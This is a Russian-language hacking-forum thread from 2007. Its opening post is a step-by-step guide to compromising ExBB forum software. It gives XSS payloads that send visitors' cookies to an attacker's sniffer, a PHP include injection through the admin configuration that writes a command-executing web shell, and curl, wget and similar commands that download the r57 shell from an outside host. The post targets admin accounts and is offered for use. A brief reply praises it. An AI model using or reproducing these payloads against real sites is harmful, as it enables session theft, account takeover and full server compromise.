Форумы Exbb Анализ уязвимостей

Discussion in 'Уязвимости CMS/форумов' started by N0n$e№Z, 5 Jan 2007.

  1. N0n$e№Z

    N0n$e№Z Member

    Joined:
    27 Nov 2006
    Messages:
    16
    Likes Received:
    6
    Reputations:
    0
    И так в этой статье я расскажу как использовать уязвимости в форумах ExBB

    XSS:

    Code:
    [+email]'style='display:none;background:url(javascript:document.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
    [+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]
    Перед использованием удалить из строчек +

    Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
    Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
    Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!

    Exploit's :

    http://www.milw0rm.com/exploits/1713
    http://www.milw0rm.com/exploits/1686


    PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)

    Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!

    Зашли мы в админку:
    1.Выбираем из столбца меню "Конфигурация".
    2.Находим строчку URL вашей конференции
    3.Там будет что-то вроде http://site/exbb/
    4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
    5.Все
    Объясню...
    '.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'

    hackexbb.txt (Должен иметь содержимое со скриптом)

    PHP:
    <?
    $fp=fopen("im/avatars/personal/shell.php""w");
    fputs($fp,"<?
    system(\$_GET['c']);
    ?>"
    );
    fclose($fp);
    ?>
    Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!

    Далее...

    Все это примет вид - http://site/exbb/im/avatars/personal/shell.php

    Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls

    Теперь о командах:
    ls - просмотр файлов в данной директоии
    pwd - просмотр пути до шелла.
    uname - a - Имя ОС

    Для заливки файлом используем команды:

    curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

    wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

    get http://vrms.narod.ru/r57shell.php > /r57shell.php

    links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php

    lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php

    fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

    И дальше r57 поможет вам во всем!!

    Удачи!Данная статья не является пособием по взлому)))
     
    4 people like this.
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Статья неплохая по моему, вот только имхо надо перенести в статьи, а не уязвимости))